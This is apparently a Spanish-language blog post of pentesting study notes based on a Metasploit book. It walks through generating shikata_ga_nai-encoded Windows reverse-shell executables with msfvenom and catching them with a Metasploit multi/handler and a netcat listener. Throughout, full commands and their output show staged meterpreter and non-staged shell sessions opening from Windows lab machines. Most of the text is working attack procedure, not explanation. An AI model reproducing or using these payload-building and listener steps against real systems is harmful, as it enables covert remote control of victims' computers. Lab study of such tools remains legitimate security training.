jejo.es (Em50L)

En menos de 50 líneas.

Msfvenom_clientsideattacks Metasploit_Revelated_Sagar_Rahalkar

Publicado:
#iot#aprendizaje#vpn
#Servidores#linux#hardening#pentesting

Apuntes inompletos Msfvenom libro: clientsideattacks Metasploit Revelated de Sagar Rahalkar

root@kali:~# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
....

msfvenom -a x86 --platform windows \
-p windows/meterpreter/reverse_tcp  \
LHOST=192.168.56.102 LPORT=8080 \
-e x86/shikata_ga_nai -f exe -o  \
/root/payload_msfvenom_192_168_56_102_8080.exe


root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=8080 -e x86/shikata_ga_nai -f exe -o /root/payload_msfvenom.exe
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of exe file: 73802 bytes
Saved as: /root/payload_msfvenom.exe
root@kali:~#

donde:

  • -a x86 es la arquitectura del procesador
  • --platform windows la plataforma
  • -p windows/meterpreter/reverse_tcp el tipo de payload/carga a crear
  • LHOST=192.168.56.102 la ip a la que se conectara (parametros especificos del payload)
  • LPORT=8080 el puerto al que se conectara.
  • -e x86/shikata_ga_nai el encoder a utilizar
  • -f exe el tipo de archivo a crear
  • -o /root/payload_msfvenom.exe el archivo de salida

Por otro lado tenemos que lanzar el socket/proceso a la escucha. A la espera de que se ejecute el programa payload_msfvenom.exe que hemos creado.

root@kali:~# msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.56.102; set lport 8080; run;exit -y"

       =[ metasploit v5.0.20-dev                          ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

payload => windows/meterpreter/reverse_tcp
LHOST => 192.168.56.102
lport => 8080
[*] Started reverse TCP handler on 192.168.56.102:8080

En el momento en el que se lanza el payload_msfvenom.exe en el cliente: Aparece la conexion en el servidor que estaba a la escucha.

[*] Sending stage (179779 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.102:8080 -> 192.168.56.1:48116) at 2019-07-23 05:26:40 -0400

meterpreter > sysinfo
Computer        : W7B-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : es_ES
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 
meterpreter > 
meterpreter >

Otra forma. lanzo el “multi/handler” a mano desde msfconsole

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set lport 8080
run

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > info

       Name: Generic Payload Handler
...

Description:
  This module is a stub that provides all of the features of the 
  Metasploit payload system to exploits that have been launched 
  outside of the framework.

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.56.102
msf5 exploit(multi/handler) > set lport 8080
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.102:8080

[*] Sending stage (179779 bytes) to 192.168.56.104
[*] Meterpreter session 1 opened (192.168.56.102:8080 -> 192.168.56.104:49157) at 2019-07-25 16:50:22 -0400

meterpreter > 

meterpreter > sysinfo
Computer        : W7MINPC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : es_ES
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

meterpreter > sysinfo
Computer        : W7MINPC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : es_ES
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >




Crear un Reverse no stagged.

https://medium.com/@hakluke/haklukes-guide-to-hacking-without-metasploit-1bbbe3d14f90

msfvenom -a x86 --platform windows \
-p windows/shell_reverse_tcp  \
LHOST=192.168.56.102 LPORT=8080 \
-e x86/shikata_ga_nai -f exe -o  \
/root/msfvenom_unstaged_reverse_shell_192_168_56_102_8080.exe


root@kali:~# msfvenom -a x86 --platform windows \
> -p windows/shell_reverse_tcp  \
> LHOST=192.168.56.102 LPORT=8080 \
> -e x86/shikata_ga_nai -f exe -o  \
> /root/msfvenom_unstaged_reverse_shell_192_168_56_102_8080.exe

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe file: 73802 bytes
Saved as: /root/msfvenom_unstaged_reverse_shell_192_168_56_102_8080.exe
root@kali:~#

Ahora coloco un “listener” a la espera de que se ejecute el payload

nc -nvlp 8080

y cuando se lanza el payload ya tengo interprete de comandos.

root@kali:~# nc -nvlp 8080
listening on [any] 8080 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 1041
'\\VBOXSVR\tmpW7\pentesting'
CMD.EXE se inici� con esta ruta como el directorio actual. No se permiten
rutas UNC. Regresando de manera predeterminada al directorio Windows.
Microsoft Windows XP [Versi�n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS>